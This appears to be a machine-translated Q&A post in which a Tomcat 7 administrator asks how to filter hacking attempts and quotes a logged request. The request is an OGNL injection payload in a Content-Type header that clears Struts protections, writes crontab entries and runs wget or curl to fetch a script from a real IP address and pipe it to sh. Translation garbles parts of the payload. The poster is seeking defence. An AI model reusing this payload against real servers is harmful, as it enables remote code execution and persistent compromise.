誰かがTomcat 7とJava 1.6.0.45でサーバーをハッキングしようとしていることがtomcatstdoutログに記録されています。これらの要求を受けるのを防ぐためには、よりよい方法であるはずです。Tomcat 7のFileUploadを使ってスクリプトを送信しようとしているHacker
このタイプのリクエストをフィルタリングする方法はありますか?
ログに完全なメッセージがある:
GetRequestHTTP:FileUploadException要求は、コンテンツタイプヘッダは%{(#_ = 'マルチパート/で、マルチパート/フォームデータまたは混合/マルチストリームが含まれていません(#dm = @ ognl.OgnlContext @ DEFAULT_MEMBER_ACCESS)(#memberAccess?(#_ memberAccess =#dm):(#コンテナ=#コンテキスト['com.opensymphony.xwork2.ActionContext.container'] (#ognlUtil.getExcludedPackageNames()。clear())(#ognlUtil.getExcludedClasses()。clear())#ognlUtil.getExcludedClasses()。 )#(#cmd = 'echo "*/20 * * * * wget -O - -q htp://5.188.87.12/icons/logo.jpg | sh \ n */19 * * * * curl http://5.188.87.12/icons/logo.jpg|sh "| crontab - ; wget -O - -q http://5.188.87.12/icons/logo.jpg|sh ')(#iswin =(@ java (#cmds =(#iswin?{'cmd.exe'、 '/ c'、#cmd})を使用して、 (#p = new java.lang.ProcessBuilder(#cmds))(#p.redirectErrorStream(true))。(#process = {{/ bin/bash} (@ [email protected](#process.getInputStream())。#p.start())(#ros = ()、#ros))(#ros.flush()))
スタックオーバーフローはプログラミングに関する質問の回答です。あなたは特定の質問をしているようには見えません。サーバーの管理に関する質問は、https://serverfault.com –
で質問に回答してください。 – sirlucas